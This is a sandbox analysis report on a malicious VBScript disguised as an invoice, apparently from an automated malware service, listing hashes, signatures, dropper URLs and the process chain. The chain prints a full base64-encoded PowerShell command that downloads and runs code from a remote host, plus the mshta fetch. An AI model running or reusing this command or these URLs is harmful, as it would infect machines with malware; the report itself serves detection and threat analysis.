Analysis

  • max time kernel
    22s
  • max time network
    21s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    13-01-2021 06:02

General

  • Target

    Invoice-ID43739424297.vbs

  • Size

    305B

  • MD5

    e78c88623c207166afa977ddb0afefc4

  • SHA1

    ad5bc3c62e12ca88fc6bd8e51001156e379433fb

  • SHA256

    695c7c580690a30a5454ab156ad21d44da887098ad00b2cfff3b9b11e80b4c6d

  • SHA512

    9e13dfb091903e31d3ff535c17f0952e6445252f12101c777e31a590bae626833259de999bf5d621de4c0270a0a036bab6db84d1fa72dd0b727253a2c88046c2

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://www.minpic.de/k/bgnt/ce637

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 41 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Invoice-ID43739424297.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1916
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" https://www.minpic.de/k/bgnu/n5z5u
      2⤵
      • Blocklisted process makes network request
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:1428
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBgAEUAWAAgACgAKABuAGAAZQBgAFcAYAAtAE8AYgBqAGAARQBgAGMAYABUACAAKAAoACcATgBlAHQAJwArACcALgAnACsAJwBXAGUAYgBjACcAKwAnAGwAaQBlAG4AdAAnACkAKQApAC4AKAAoACcARAAnACsAJwBvACcAKwAnAHcAJwArACcAbgAnACsAJwBsACcAKwAnAG8AJwArACcAYQAnACsAJwBkACcAKwAnAHMAJwArACcAdAByAGkAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAJwArACcAbgAnACsAJwBnACcAKQApAC4ASQBuAFYAbwBrAEUAKAAoACgAJwBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBtAGkAbgBwAGkAYwAuAGQAZQAvAGsALwBiAGcAbgB0AC8AYwBlADYAMwA3ACcAKQApACkAKQAuAHIAZQBwAGwAYQBjAGUAKAAnAFwAfAAvACcALAAnACgAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAXABcACcALAAnACkAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAXAAvACcALAAnAHsAJwApAC4AcgBlAHAAbABhAGMAZQAoACcALwBcACcALAAnAH0AJwApAA==
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1532
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          4⤵
            PID:1620
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
            4⤵
              PID:1608
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
              4⤵
                PID:1736
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                4⤵
                  PID:1908
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  4⤵
                    PID:1548

            Network

            MITRE ATT&CK Matrix ATT&CK v6

            Defense Evasion

            Modify Registry

            1
            T1112

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • memory/1428-2-0x0000000000000000-mapping.dmp
            • memory/1532-8-0x000000001ACA0000-0x000000001ACA1000-memory.dmp
              Filesize

              4KB

            • memory/1532-5-0x0000000000000000-mapping.dmp
            • memory/1532-6-0x000007FEF2F20000-0x000007FEF390C000-memory.dmp
              Filesize

              9.9MB

            • memory/1532-7-0x0000000002360000-0x0000000002361000-memory.dmp
              Filesize

              4KB

            • memory/1532-9-0x00000000024A0000-0x00000000024A1000-memory.dmp
              Filesize

              4KB

            • memory/1532-10-0x0000000002560000-0x0000000002561000-memory.dmp
              Filesize

              4KB

            • memory/1532-11-0x000000001B550000-0x000000001B551000-memory.dmp
              Filesize

              4KB

            • memory/1532-12-0x000000001AA30000-0x000000001AA31000-memory.dmp
              Filesize

              4KB

            • memory/1532-13-0x000000001B6C0000-0x000000001B6C7000-memory.dmp
              Filesize

              28KB

            • memory/1532-14-0x000000001B6D0000-0x000000001B6D8000-memory.dmp
              Filesize

              32KB

            • memory/1816-4-0x000007FEF76B0000-0x000007FEF792A000-memory.dmp
              Filesize

              2.5MB

            • memory/1916-3-0x0000000002760000-0x0000000002764000-memory.dmp
              Filesize

              16KB